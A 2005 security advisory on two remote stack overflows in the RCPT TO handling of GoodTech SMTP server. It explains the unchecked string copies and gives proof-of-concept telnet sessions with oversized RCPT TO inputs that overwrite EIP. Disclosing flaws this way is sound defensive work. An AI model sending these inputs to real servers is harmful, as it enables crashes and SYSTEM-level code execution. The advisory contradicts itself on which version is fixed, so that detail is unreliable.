GoodTech SMTP server 5.16 RCPT TO command remote buffer overflow
Arbitrary code execution in GoodTech's SMTP server
discovered by Raphaël Rigo
Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified), <= regged and 5.15 probably too
Not affected Version: 5.17
OS affected: All WinNT (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp
Overview
========
The product provides Simple Mail Transfer Protocol (SMTP) to any email client
out of the box. It forwards email messages directly to their recipients.
GoodTech SMTP server runs as a service on the host Windows machine.
Vulnerabilities
===============
1) Stack overflow in RCPT TO command handling
Unchecked string copies allow a classic stack overflow.
Details :
A cascade of unchecked string copies is responsible for this
vulnerability :
- The maximum length of a command is 4096.
- The requested email is copied without checking nor direct
consequences into a 2048 bytes buffer.
- The domain is extracted and copied without checking nor
direct consequences into a 256 bytes buffer.
- The following code is executed : sprintf(buf,"mx.%s",domain)
buf is only 64 bytes long, and can thus be overflowed,
overwriting a string containing the DNS server to be used to
find the MX request.
- This string being non-empty, the following code is executed:
sprintf(buf1024, "Using DNS Server %s", dnsserver)
but since we have ~4000 bytes for the domain, this can overflow
and overwrite the return address of the function, allowing
arbitrary code execution.
Risk : Critical
The attacker may execute arbitrary code with the privileges of the
SYSTEM user (by default).
Proof of concept :
$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
HELO aaa
250 OK
RCPT TO: <aa@|'A'x1100>
Connection closed by foreign host.
Service crashes with EIP==0x41414141
Workaround :
There is no possible workaround.
Solution :
Update to v5.16
-----------------------------------------------------------------------
2) Stack overflow in multiple RCPT TO commands handling
Unchecked string copy allows a classic stack overflow.
Details :
For each RCPT TO command, the server fills a 1300 bytes structure
containing the requested command and the MX server for the requested
email.
The server allows up to 99 RCPT TO for a single mail, but the filling
of this structure is done via unchecked string copy : the command,
up to 4096 bytes long, is copied without checking into the structure.
This behaviour allows us to overwrite the return address of the thread
by issuing a long command in the 99th RCPT TO command.
We have then to issue a QUIT command to exit the thread and execute
our code.
Risk : Critical
The attacker may execute arbitrary code with the privileges of the
SYSTEM user (by default).
Proof of concept :
$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
HELO aaa
250 OK
-- Repeat this part 98 times
RCPT TO: <aa@aa>
250 OK
--
RCPT TO: <|'A'x2600|@localhost>
250 OK
QUIT
Connection closed by foreign host.
Service crashes with EIP==0x41414141
Workaround :
There is no possible workaround.
Solution :
Update to v5.16
-----------------------------------------------------------------------
Acknowledgments
===============
Thanks to the developer for quick response and fix.
Timeline
========
2005-07-19 Discovery
2005-07-21 First attempt to contact developer
2005-07-21 Developer reply
2005-07-22 Fixed version released
2005-07-23 Advisory published